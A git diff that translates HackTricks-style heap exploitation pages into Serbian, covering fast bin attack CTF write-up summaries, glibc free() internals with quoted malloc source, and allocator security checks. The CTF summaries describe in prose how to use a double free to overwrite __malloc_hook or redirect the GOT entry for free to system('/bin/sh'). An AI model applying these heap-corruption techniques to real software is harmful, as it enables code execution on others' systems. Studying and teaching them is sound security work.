+- **Prepisivanje malloc hook-a**: Za ovo, i zloupotrebljavajući prethodnu preklapajuću situaciju, bilo je moguće imati 2 chunk-a koja su ukazivala na istu memoriju. Stoga, oslobađanjem oba (oslobađanjem drugog chunk-a između da bi se izbegle zaštite) bilo je moguće imati isti chunk u fast bin-u 2 puta. Zatim, bilo je moguće ponovo ga alocirati, prepisati adresu sledećeg chunk-a da ukazuje malo pre `__malloc_hook` (tako da ukazuje na ceo broj za koji malloc misli da je slobodna veličina - još jedan zaobilaženje), ponovo ga alocirati i zatim alocirati drugi chunk koji će primiti adresu do malloc hook-ova.\
+Na kraju, **one gadget** je napisan unutra.
 - **CTF** [**https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html)**:**
-  - There is a heap overflow and use after free and double free because when a chunk is freed it's possible to reuse and re-free the pointers
-    - **Libc info leak**: Just free some chunks and they will get a pointer to a part of the main arena location. As you can reuse freed pointers, just read this address.
-    - **Fast bin attack**: All the pointers to the allocations are stored inside an array, so we can free a couple of fast bin chunks and in the last one overwrite the address to point a bit before this array of pointers. Then, allocate a couple of chunks with the same size and we will get first the legit one and then the fake one containing the array of pointers. We can now overwrite this allocation pointers to make the GOT address of `free` point to `system` and then write `"/bin/sh"` in chunk 1 to then call `free(chunk1)` which instead will execute `system("/bin/sh")`.
+- Postoji heap overflow i upotreba nakon oslobađanja i dvostruko oslobađanje jer kada se chunk oslobodi, moguće je ponovo koristiti i ponovo osloboditi pokazivače.
+- **Libc info leak**: Samo oslobodite neke chunk-ove i dobićete pokazivač na deo lokacije glavne arene. Kako možete ponovo koristiti oslobođene pokazivače, samo pročitajte ovu adresu.
+- **Fast bin attack**: Svi pokazivači na alokacije se čuvaju unutar niza, tako da možemo osloboditi nekoliko fast bin chunk-ova i u poslednjem prepisati adresu da ukazuje malo pre ovog niza pokazivača. Zatim, alocirajte nekoliko chunk-ova iste veličine i prvo ćemo dobiti legitiman, a zatim lažni koji sadrži niz pokazivača. Sada možemo prepisati ove pokazivače alokacije da učinimo GOT adresu `free` da ukazuje na `system` i zatim napisati `"/bin/sh"` u chunk 1 da bismo zatim pozvali `free(chunk1)` koji će umesto toga izvršiti `system("/bin/sh")`.
 - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html)
-  - Another example of abusing a one byte overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
+- Još jedan primer zloupotrebe prelivanja od jednog bajta za konsolidaciju chunk-ova u nesortiranom binu i dobijanje libc infoleak-a, a zatim izvođenje fast bin napada za prepisivanje malloc hook-a sa adresom one gadget-a.
 - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html)
-  - After an infoleak abusing the unsorted bin with a UAF to leak a libc address and a PIE address, the exploit of this CTF used a fast bin attack to allocate a chunk in a place where the pointers to controlled chunks were located so it was possible to overwrite certain pointers to write a one gadget in the GOT
-  - You can find a Fast Bin attack abused through an unsorted bin attack:
-    - Note that it's common before performing fast bin attacks to abuse the free-lists to leak libc/heap addresses (when needed).
+- Nakon infoleak-a zloupotrebljavajući nesortirani bin sa UAF za procurivanje libc adrese i PIE adrese, eksploatacija ovog CTF-a koristila je fast bin napad za alociranje chunk-a na mestu gde su se nalazili pokazivači na kontrolisane chunk-ove, tako da je bilo moguće prepisati određene pokazivače da bi se napisao one gadget u GOT.
+- Možete pronaći Fast Bin napad zloupotrebljen kroz nesortirani bin napad:
+- Imajte na umu da je uobičajeno pre izvođenja fast bin napada zloupotrebljavati slobodne liste za procurivanje libc/heap adresa (kada je potrebno).
 - [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
-  - We can only allocate chunks of size greater than `0x100`.
-  - Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
-  - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
+- Možemo alocirati samo chunk-ove veličine veće od `0x100`.
+- Prepišite `global_max_fast` koristeći Unsorted Bin napad (radi 1/16 puta zbog ASLR, jer treba da modifikujemo 12 bita, ali moramo modifikovati 16 bita).
+- Fast Bin napad za modifikaciju globalnog niza chunk-ova. Ovo daje proizvoljnu read/write primitivu, koja omogućava modifikaciju GOT-a i postavljanje neke funkcije da ukazuje na `system`.
 
 {{#ref}}
 unsorted-bin-attack.md
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
index 04855d5fb..70d10ca79 100644
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
@@ -1,4 +1,4 @@
-# Heap Memory Functions
+# Funkcije za Heap Memoriju
 
 {{#include ../../../banners/hacktricks-training.md}}
 
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md
index e57b1fa77..fcce1f35c 100644
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md
@@ -4,93 +4,90 @@
 
 ## Free Order Summary 
 
-(No checks are explained in this summary and some case have been omitted for brevity)
+(Nema provera objašnjenih u ovom sažetku i neki slučajevi su izostavljeni radi sažetosti)
 
-1. If the address is null don't do anything
-2. If the chunk was mmaped, mummap it and finish
-3. Call `_int_free`:
-   1. If possible, add the chunk to the tcache
-   2. If possible, add the chunk to the fast bin
-   3. Call `_int_free_merge_chunk` to consolidate the chunk is needed and add it to the unsorted list
+1. Ako je adresa null, ne radite ništa
+2. Ako je deo bio mmapovan, mummapujte ga i završite
+3. Pozovite `_int_free`:
+   1. Ako je moguće, dodajte deo u tcache
+   2. Ako je moguće, dodajte deo u fast bin
+   3. Pozovite `_int_free_merge_chunk` da konsolidujete deo ako je potrebno i dodajte ga u nesortiranu listu
 
 ## \_\_libc_free 
 
-`Free` calls `__libc_free`.
+`Free` poziva `__libc_free`.
 
-- If the address passed is Null (0) don't do anything.
-- Check pointer tag
-- If the chunk is `mmaped`, `mummap` it and that all
-- If not, add the color and call `_int_free` over it
+- Ako je adresa koja je prosleđena Null (0), ne radite ništa.
+- Proverite oznaku pokazivača
+- Ako je deo `mmapovan`, `mummap`ujte ga i to je to
+- Ako nije, dodajte boju i pozovite `_int_free` na njemu
 
 

 
 __lib_free code
-
 ```c
 void
 __libc_free (void *mem)
 {
-  mstate ar_ptr;
-  mchunkptr p;                          /* chunk corresponding to mem */
+mstate ar_ptr;
+mchunkptr p;                          /* chunk corresponding to mem */
 
-  if (mem == 0)                              /* free(0) has no effect */
-    return;
+if (mem == 0)                              /* free(0) has no effect */
+return;
 
-  /* Quickly check that the freed pointer matches the tag for the memory.
-     This gives a useful double-free detection.  */
-  if (__glibc_unlikely (mtag_enabled))
-    *(volatile char *)mem;
+/* Quickly check that the freed pointer matches the tag for the memory.
+This gives a useful double-free detection.  */
+if (__glibc_unlikely (mtag_enabled))
+*(volatile char *)mem;
 
-  int err = errno;
+int err = errno;
 
-  p = mem2chunk (mem);
+p = mem2chunk (mem);
 
-  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
-    {
-      /* See if the dynamic brk/mmap threshold needs adjusting.
-	 Dumped fake mmapped chunks do not affect the threshold.  */
-      if (!mp_.no_dyn_threshold
-          && chunksize_nomask (p) > mp_.mmap_threshold
-          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX)
-        {
-          mp_.mmap_threshold = chunksize (p);
-          mp_.trim_threshold = 2 * mp_.mmap_threshold;
-          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
-                      mp_.mmap_threshold, mp_.trim_threshold);
-        }
-      munmap_chunk (p);
-    }
-  else
-    {
-      MAYBE_INIT_TCACHE ();
+if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+{
+/* See if the dynamic brk/mmap threshold needs adjusting.
+Dumped fake mmapped chunks do not affect the threshold.  */
+if (!mp_.no_dyn_threshold
+&& chunksize_nomask (p) > mp_.mmap_threshold
+&& chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX)
+{
+mp_.mmap_threshold = chunksize (p);
+mp_.trim_threshold = 2 * mp_.mmap_threshold;
+LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+mp_.mmap_threshold, mp_.trim_threshold);
+}
+munmap_chunk (p);
+}
+else
+{
+MAYBE_INIT_TCACHE ();
 
-      /* Mark the chunk as belonging to the library again.  */
-      (void)tag_region (chunk2mem (p), memsize (p));
+/* Mark the chunk as belonging to the library again.  */
+(void)tag_region (chunk2mem (p), memsize (p));
 
-      ar_ptr = arena_for_chunk (p);
-      _int_free (ar_ptr, p, 0);
-    }
+ar_ptr = arena_for_chunk (p);
+_int_free (ar_ptr, p, 0);
+}
 
-  __set_errno (err);
+__set_errno (err);
 }
 libc_hidden_def (__libc_free)
 ```
-
 

 
 ## \_int_free 
 
 ### \_int_free start 
 
-It starts with some checks making sure:
+Počinje sa nekim proverama koje osiguravaju:
 
-- the **pointer** is **aligned,** or trigger error `free(): invalid pointer`
-- the **size** isn't less than the minimum and that the **size** is also **aligned** or trigger error: `free(): invalid size`
+- da je **pokazivač** **poravnat,** ili izaziva grešku `free(): invalid pointer`
+- da **veličina** nije manja od minimuma i da je **veličina** takođe **poravnata** ili izaziva grešku: `free(): invalid size`
 
 

 
 _int_free start
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4493C1-L4513C28
 
@@ -99,288 +96,279 @@ It starts with some checks making sure:
 static void
 _int_free (mstate av, mchunkptr p, int have_lock)
 {
-  INTERNAL_SIZE_T size;        /* its size */
-  mfastbinptr *fb;             /* associated fastbin */
+INTERNAL_SIZE_T size;        /* its size */
+mfastbinptr *fb;             /* associated fastbin */
 
-  size = chunksize (p);
+size = chunksize (p);
 
-  /* Little security check which won't hurt performance: the
-     allocator never wraps around at the end of the address space.
-     Therefore we can exclude some size values which might appear
-     here by accident or by "design" from some intruder.  */
-  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
-      || __builtin_expect (misaligned_chunk (p), 0))
-    malloc_printerr ("free(): invalid pointer");
-  /* We know that each chunk is at least MINSIZE bytes in size or a
-     multiple of MALLOC_ALIGNMENT.  */
-  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
-    malloc_printerr ("free(): invalid size");
+/* Little security check which won't hurt performance: the
+allocator never wraps around at the end of the address space.
+Therefore we can exclude some size values which might appear
+here by accident or by "design" from some intruder.  */
+if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+|| __builtin_expect (misaligned_chunk (p), 0))
+malloc_printerr ("free(): invalid pointer");
+/* We know that each chunk is at least MINSIZE bytes in size or a
+multiple of MALLOC_ALIGNMENT.  */
+if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+malloc_printerr ("free(): invalid size");
 
-  check_inuse_chunk(av, p);
+check_inuse_chunk(av, p);
 ```
-
 

 
 ### \_int_free tcache 
 
-It'll first try to allocate this chunk in the related tcache. However, some checks are performed previously. It'll loop through all the chunks of the tcache in the same index as the freed chunk and:
+Prvo će pokušati da alocira ovaj deo u povezanoj tcache. Međutim, prethodno se vrše neka proveravanja. Proći će kroz sve delove tcache na istom indeksu kao oslobođeni deo i:
 
-- If there are more entries than `mp_.tcache_count`: `free(): too many chunks detected in tcache`
-- If the entry is not aligned: free(): `unaligned chunk detected in tcache 2`
-- if the freed chunk was already freed and is present as chunk in the tcache: `free(): double free detected in tcache 2`
+- Ako ima više unosa nego `mp_.tcache_count`: `free(): previše delova otkriveno u tcache`
+- Ako unos nije poravnat: free(): `neporavnat deo otkriven u tcache 2`
+- ako je oslobođeni deo već bio oslobođen i prisutan je kao deo u tcache: `free(): dvostruko oslobađanje otkriveno u tcache 2`
 
-If all goes well, the chunk is added to the tcache and the functions returns.
+Ako sve prođe dobro, deo se dodaje u tcache i funkcija se vraća.
 
 

 
 _int_free tcache
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4515C1-L4554C7
 #if USE_TCACHE
-  {
-    size_t tc_idx = csize2tidx (size);
-    if (tcache != NULL && tc_idx < mp_.tcache_bins)
-      {
-	/* Check to see if it's already in the tcache.  */
-	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+{
+size_t tc_idx = csize2tidx (size);
+if (tcache != NULL && tc_idx < mp_.tcache_bins)
+{
+/* Check to see if it's already in the tcache.  */
+tcache_entry *e = (tcache_entry *) chunk2mem (p);
 
-	/* This test succeeds on double free.  However, we don't 100%
-	   trust it (it also matches random payload data at a 1 in
-	   2^ chance), so verify it's not an unlikely
-	   coincidence before aborting.  */
-	if (__glibc_unlikely (e->key == tcache_key))
-	  {
-	    tcache_entry *tmp;
-	    size_t cnt = 0;
-	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
-	    for (tmp = tcache->entries[tc_idx];
-		 tmp;
-		 tmp = REVEAL_PTR (tmp->next), ++cnt)
-	      {
-		if (cnt >= mp_.tcache_count)
-		  malloc_printerr ("free(): too many chunks detected in tcache");
-		if (__glibc_unlikely (!aligned_OK (tmp)))
-		  malloc_printerr ("free(): unaligned chunk detected in tcache 2");
-		if (tmp == e)
-		  malloc_printerr ("free(): double free detected in tcache 2");
-		/* If we get here, it was a coincidence.  We've wasted a
-		   few cycles, but don't abort.  */
-	      }
-	  }
+/* This test succeeds on double free.  However, we don't 100%
+trust it (it also matches random payload data at a 1 in
+2^ chance), so verify it's not an unlikely
+coincidence before aborting.  */
+if (__glibc_unlikely (e->key == tcache_key))
+{
+tcache_entry *tmp;
+size_t cnt = 0;
+LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+for (tmp = tcache->entries[tc_idx];
+tmp;
+tmp = REVEAL_PTR (tmp->next), ++cnt)
+{
+if (cnt >= mp_.tcache_count)
+malloc_printerr ("free(): too many chunks detected in tcache");
+if (__glibc_unlikely (!aligned_OK (tmp)))
+malloc_printerr ("free(): unaligned chunk detected in tcache 2");
+if (tmp == e)
+malloc_printerr ("free(): double free detected in tcache 2");
+/* If we get here, it was a coincidence.  We've wasted a
+few cycles, but don't abort.  */
+}
+}
 
-	if (tcache->counts[tc_idx] < mp_.tcache_count)
-	  {
-	    tcache_put (p, tc_idx);
-	    return;
-	  }
-      }
-  }
+if (tcache->counts[tc_idx] < mp_.tcache_count)
+{
+tcache_put (p, tc_idx);
+return;
+}
+}
+}
 #endif
 ```
-
 

 
 ### \_int_free fast bin 
 
-Start by checking that the size is suitable for fast bin and check if it's possible to set it close to the top chunk.
+Počnite proverom da li je veličina pogodna za fast bin i proverite da li je moguće postaviti je blizu top chunk-a.
 
-Then, add the freed chunk at the top of the fast bin while performing some checks:
+Zatim, dodajte oslobođeni chunk na vrh fast bin-a dok vršite neke provere:
 
-- If the size of the chunk is invalid (too big or small) trigger: `free(): invalid next size (fast)`
-- If the added chunk was already the top of the fast bin: `double free or corruption (fasttop)`
-- If the size of the chunk at the top has a different size of the chunk we are adding: `invalid fastbin entry (free)`
+- Ako je veličina chunk-a nevažeća (prevelika ili premala) aktivirajte: `free(): invalid next size (fast)`
+- Ako je dodatni chunk već bio na vrhu fast bin-a: `double free or corruption (fasttop)`
+- Ako veličina chunk-a na vrhu ima drugačiju veličinu od chunk-a koji dodajemo: `invalid fastbin entry (free)`
 
 

 
 _int_free Fast Bin
-
 ```c
- // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4556C2-L4631C4
+// From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4556C2-L4631C4
 
- /*
-    If eligible, place chunk on a fastbin so it can be found
-    and used quickly in malloc.
-  */
+/*
+If eligible, place chunk on a fastbin so it can be found
+and used quickly in malloc.
+*/
 
-  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
 
 #if TRIM_FASTBINS
-      /*
-	If TRIM_FASTBINS set, don't place chunks
-	bordering top into fastbins
-      */
-      && (chunk_at_offset(p, size) != av->top)
+/*
+If TRIM_FASTBINS set, don't place chunks
+bordering top into fastbins
+*/
+&& (chunk_at_offset(p, size) != av->top)
 #endif
-      ) {
+) {
 
-    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
-			  <= CHUNK_HDR_SZ, 0)
-	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
-			     >= av->system_mem, 0))
-      {
-	bool fail = true;
-	/* We might not have a lock at this point and concurrent modifications
-	   of system_mem might result in a false positive.  Redo the test after
-	   getting the lock.  */
-	if (!have_lock)
-	  {
-	    __libc_lock_lock (av->mutex);
-	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ
-		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
-	    __libc_lock_unlock (av->mutex);
-	  }
+if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+<= CHUNK_HDR_SZ, 0)
+|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+>= av->system_mem, 0))
+{
+bool fail = true;
+/* We might not have a lock at this point and concurrent modifications
+of system_mem might result in a false positive.  Redo the test after
+getting the lock.  */
+if (!have_lock)
+{
+__libc_lock_lock (av->mutex);
+fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ
+|| chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+__libc_lock_unlock (av->mutex);
+}
 
-	if (fail)
-	  malloc_printerr ("free(): invalid next size (fast)");
-      }
+if (fail)
+malloc_printerr ("free(): invalid next size (fast)");
+}
 
-    free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);
+free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);
 
-    atomic_store_relaxed (&av->have_fastchunks, true);
-    unsigned int idx = fastbin_index(size);
-    fb = &fastbin (av, idx);
+atomic_store_relaxed (&av->have_fastchunks, true);
+unsigned int idx = fastbin_index(size);
+fb = &fastbin (av, idx);
 
-    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
-    mchunkptr old = *fb, old2;
+/* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+mchunkptr old = *fb, old2;
 
-    if (SINGLE_THREAD_P)
-      {
-	/* Check that the top of the bin is not the record we are going to
-	   add (i.e., double free).  */
-	if (__builtin_expect (old == p, 0))
-	  malloc_printerr ("double free or corruption (fasttop)");
-	p->fd = PROTECT_PTR (&p->fd, old);
-	*fb = p;
-      }
-    else
-      do
-	{
-	  /* Check that the top of the bin is not the record we are going to
-	     add (i.e., double free).  */
-	  if (__builtin_expect (old == p, 0))
-	    malloc_printerr ("double free or corruption (fasttop)");
-	  old2 = old;
-	  p->fd = PROTECT_PTR (&p->fd, old);
-	}
-      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
-	     != old2);
+if (SINGLE_THREAD_P)
+{
+/* Check that the top of the bin is not the record we are going to
+add (i.e., double free).  */
+if (__builtin_expect (old == p, 0))
+malloc_printerr ("double free or corruption (fasttop)");
+p->fd = PROTECT_PTR (&p->fd, old);
+*fb = p;
+}
+else
+do
+{
+/* Check that the top of the bin is not the record we are going to
+add (i.e., double free).  */
+if (__builtin_expect (old == p, 0))
+malloc_printerr ("double free or corruption (fasttop)");
+old2 = old;
+p->fd = PROTECT_PTR (&p->fd, old);
+}
+while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+!= old2);
 
-    /* Check that size of fastbin chunk at the top is the same as
-       size of the chunk that we are adding.  We can dereference OLD
-       only if we have the lock, otherwise it might have already been
-       allocated again.  */
-    if (have_lock && old != NULL
-	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
-      malloc_printerr ("invalid fastbin entry (free)");
-  }
+/* Check that size of fastbin chunk at the top is the same as
+size of the chunk that we are adding.  We can dereference OLD
+only if we have the lock, otherwise it might have already been
+allocated again.  */
+if (have_lock && old != NULL
+&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+malloc_printerr ("invalid fastbin entry (free)");
+}
 ```
-
 

 
 ### \_int_free finale 
 
-If the chunk wasn't allocated yet on any bin, call `_int_free_merge_chunk`
+Ako deo još nije dodeljen nijednom kontejneru, pozovite `_int_free_merge_chunk`
 
 

 
 _int_free finale
-
 ```c
 /*
-    Consolidate other non-mmapped chunks as they arrive.
-  */
+Consolidate other non-mmapped chunks as they arrive.
+*/
 
-  else if (!chunk_is_mmapped(p)) {
+else if (!chunk_is_mmapped(p)) {
 
-    /* If we're single-threaded, don't lock the arena.  */
-    if (SINGLE_THREAD_P)
-      have_lock = true;
+/* If we're single-threaded, don't lock the arena.  */
+if (SINGLE_THREAD_P)
+have_lock = true;
 
-    if (!have_lock)
-      __libc_lock_lock (av->mutex);
+if (!have_lock)
+__libc_lock_lock (av->mutex);
 
-    _int_free_merge_chunk (av, p, size);
+_int_free_merge_chunk (av, p, size);
 
-    if (!have_lock)
-      __libc_lock_unlock (av->mutex);
-  }
-  /*
-    If the chunk was allocated via mmap, release via munmap().
-  */
+if (!have_lock)
+__libc_lock_unlock (av->mutex);
+}
+/*
+If the chunk was allocated via mmap, release via munmap().
+*/
 
-  else {
-    munmap_chunk (p);
-  }
+else {
+munmap_chunk (p);
+}
 }
 ```
-
 

 
 ## \_int_free_merge_chunk
 
-This function will try to merge chunk P of SIZE bytes with its neighbours. Put the resulting chunk on the unsorted bin list.
+Ova funkcija će pokušati da spoji chunk P od SIZE bajtova sa svojim susedima. Stavite rezultantni chunk na listu nesortiranih binova.
 
-Some checks are performed:
+Izvode se neka proveravanja:
 
-- If the chunk is the top chunk: `double free or corruption (top)`
-- If the next chunk is outside of the boundaries of the arena: `double free or corruption (out)`
-- If the chunk is not marked as used (in the `prev_inuse` from the following chunk): `double free or corruption (!prev)`
-- If the next chunk has a too little size or too big: `free(): invalid next size (normal)`
-- if the previous chunk is not in use, it will try to consolidate. But, if the prev_size differs from the size indicated in the previous chunk: `corrupted size vs. prev_size while consolidating`
+- Ako je chunk gornji chunk: `double free or corruption (top)`
+- Ako je sledeći chunk van granica arene: `double free or corruption (out)`
+- Ako chunk nije označen kao korišćen (u `prev_inuse` sledećeg chucka): `double free or corruption (!prev)`
+- Ako sledeći chunk ima premalu ili preveliku veličinu: `free(): invalid next size (normal)`
+- ako prethodni chunk nije u upotrebi, pokušaće da konsoliduje. Ali, ako se prev_size razlikuje od veličine navedene u prethodnom chunku: `corrupted size vs. prev_size while consolidating`
 
 

 
 _int_free_merge_chunk code
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4660C1-L4702C2
 
 /* Try to merge chunk P of SIZE bytes with its neighbors.  Put the
-   resulting chunk on the appropriate bin list.  P must not be on a
-   bin list yet, and it can be in use.  */
+resulting chunk on the appropriate bin list.  P must not be on a
+bin list yet, and it can be in use.  */
 static void
 _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size)
 {
-  mchunkptr nextchunk = chunk_at_offset(p, size);
+mchunkptr nextchunk = chunk_at_offset(p, size);
 
-  /* Lightweight tests: check whether the block is already the
-     top block.  */
-  if (__glibc_unlikely (p == av->top))
-    malloc_printerr ("double free or corruption (top)");
-  /* Or whether the next chunk is beyond the boundaries of the arena.  */
-  if (__builtin_expect (contiguous (av)
-			&& (char *) nextchunk
-			>= ((char *) av->top + chunksize(av->top)), 0))
-    malloc_printerr ("double free or corruption (out)");
-  /* Or whether the block is actually not marked used.  */
-  if (__glibc_unlikely (!prev_inuse(nextchunk)))
-    malloc_printerr ("double free or corruption (!prev)");
+/* Lightweight tests: check whether the block is already the
+top block.  */
+if (__glibc_unlikely (p == av->top))
+malloc_printerr ("double free or corruption (top)");
+/* Or whether the next chunk is beyond the boundaries of the arena.  */
+if (__builtin_expect (contiguous (av)
+&& (char *) nextchunk
+>= ((char *) av->top + chunksize(av->top)), 0))
+malloc_printerr ("double free or corruption (out)");
+/* Or whether the block is actually not marked used.  */
+if (__glibc_unlikely (!prev_inuse(nextchunk)))
+malloc_printerr ("double free or corruption (!prev)");
 
-  INTERNAL_SIZE_T nextsize = chunksize(nextchunk);
-  if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0)
-      || __builtin_expect (nextsize >= av->system_mem, 0))
-    malloc_printerr ("free(): invalid next size (normal)");
+INTERNAL_SIZE_T nextsize = chunksize(nextchunk);
+if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0)
+|| __builtin_expect (nextsize >= av->system_mem, 0))
+malloc_printerr ("free(): invalid next size (normal)");
 
-  free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);
+free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);
 
-  /* Consolidate backward.  */
-  if (!prev_inuse(p))
-    {
-      INTERNAL_SIZE_T prevsize = prev_size (p);
-      size += prevsize;
-      p = chunk_at_offset(p, -((long) prevsize));
-      if (__glibc_unlikely (chunksize(p) != prevsize))
-        malloc_printerr ("corrupted size vs. prev_size while consolidating");
-      unlink_chunk (av, p);
-    }
+/* Consolidate backward.  */
+if (!prev_inuse(p))
+{
+INTERNAL_SIZE_T prevsize = prev_size (p);
+size += prevsize;
+p = chunk_at_offset(p, -((long) prevsize));
+if (__glibc_unlikely (chunksize(p) != prevsize))
+malloc_printerr ("corrupted size vs. prev_size while consolidating");
+unlink_chunk (av, p);
+}
 
-  /* Write the chunk header, maybe after merging with the following chunk.  */
-  size = _int_free_create_chunk (av, p, size, nextchunk, nextsize);
-  _int_free_maybe_consolidate (av, size);
+/* Write the chunk header, maybe after merging with the following chunk.  */
+size = _int_free_create_chunk (av, p, size, nextchunk, nextsize);
+_int_free_maybe_consolidate (av, size);
 }
 ```
-
 

 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
index 18a0a02b7..47253e250 100644
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
@@ -4,160 +4,160 @@
 
 ## unlink
 
-For more info check:
+Za više informacija pogledajte:
 
 {{#ref}}
 unlink.md
 {{#endref}}
 
-This is a summary of the performed checks:
+Ovo je sažetak izvršenih provera:
 
-- Check if the indicated size of the chunk is the same as the `prev_size` indicated in the next chunk
-  - Error message: `corrupted size vs. prev_size`
-- Check also that `P->fd->bk == P` and `P->bk->fw == P`
-  - Error message: `corrupted double-linked list`
-- If the chunk is not small, check that `P->fd_nextsize->bk_nextsize == P` and `P->bk_nextsize->fd_nextsize == P`
-  - Error message: `corrupted double-linked list (not small)`
+- Proverite da li je naznačena veličina dela ista kao `prev_size` naznačena u sledećem delu
+- Poruka o grešci: `corrupted size vs. prev_size`
+- Takođe proverite da li je `P->fd->bk == P` i `P->bk->fw == P`
+- Poruka o grešci: `corrupted double-linked list`
+- Ako deo nije mali, proverite da li je `P->fd_nextsize->bk_nextsize == P` i `P->bk_nextsize->fd_nextsize == P`
+- Poruka o grešci: `corrupted double-linked list (not small)`
 
 ## \_int_malloc
 
-For more info check:
+Za više informacija pogledajte:
 
 {{#ref}}
 malloc-and-sysmalloc.md
 {{#endref}}
 
-- **Checks during fast bin search:**
-  - If the chunk is misaligned:
-    - Error message: `malloc(): unaligned fastbin chunk detected 2`
-  - If the forward chunk is misaligned:
-    - Error message: `malloc(): unaligned fastbin chunk detected`
-  - If the returned chunk has a size that isn't correct because of it's index in the fast bin:
-    - Error message: `malloc(): memory corruption (fast)`
-  - If any chunk used to fill the tcache is misaligned:
-    - Error message: `malloc(): unaligned fastbin chunk detected 3`
-- **Checks during small bin search:**
-  - If `victim->bk->fd != victim`:
-    - Error message: `malloc(): smallbin double linked list corrupted`
-- **Checks during consolidate** performed for each fast bin chunk: 
-  - If the chunk is unaligned trigger:
-    - Error message: `malloc_consolidate(): unaligned fastbin chunk detected`
-  - If the chunk has a different size that the one it should because of the index it's in:
-    - Error message: `malloc_consolidate(): invalid chunk size`
-  - If the previous chunk is not in use and the previous chunk has a size different of the one indicated by prev_chunk:
-    - Error message: `corrupted size vs. prev_size in fastbins`
-- **Checks during unsorted bin search**:
-  - If the chunk size is weird (too small or too big): 
-    - Error message: `malloc(): invalid size (unsorted)`
-  - If the next chunk size is weird (too small or too big):
-    - Error message: `malloc(): invalid next size (unsorted)`
-  - If the previous size indicated by the next chunk differs from the size of the chunk:
-    - Error message: `malloc(): mismatching next->prev_size (unsorted)`
-  - If not `victim->bck->fd == victim` or not `victim->fd == av (arena)`:
-    - Error message: `malloc(): unsorted double linked list corrupted`
-    - As we are always checking the las one, it's fd should be pointing always to the arena struct.
-  - If the next chunk isn't indicating that the previous is in use:
-    - Error message: `malloc(): invalid next->prev_inuse (unsorted)`
-  - If `fwd->bk_nextsize->fd_nextsize != fwd`:
-    - Error message: `malloc(): largebin double linked list corrupted (nextsize)`
-  - If `fwd->bk->fd != fwd`:
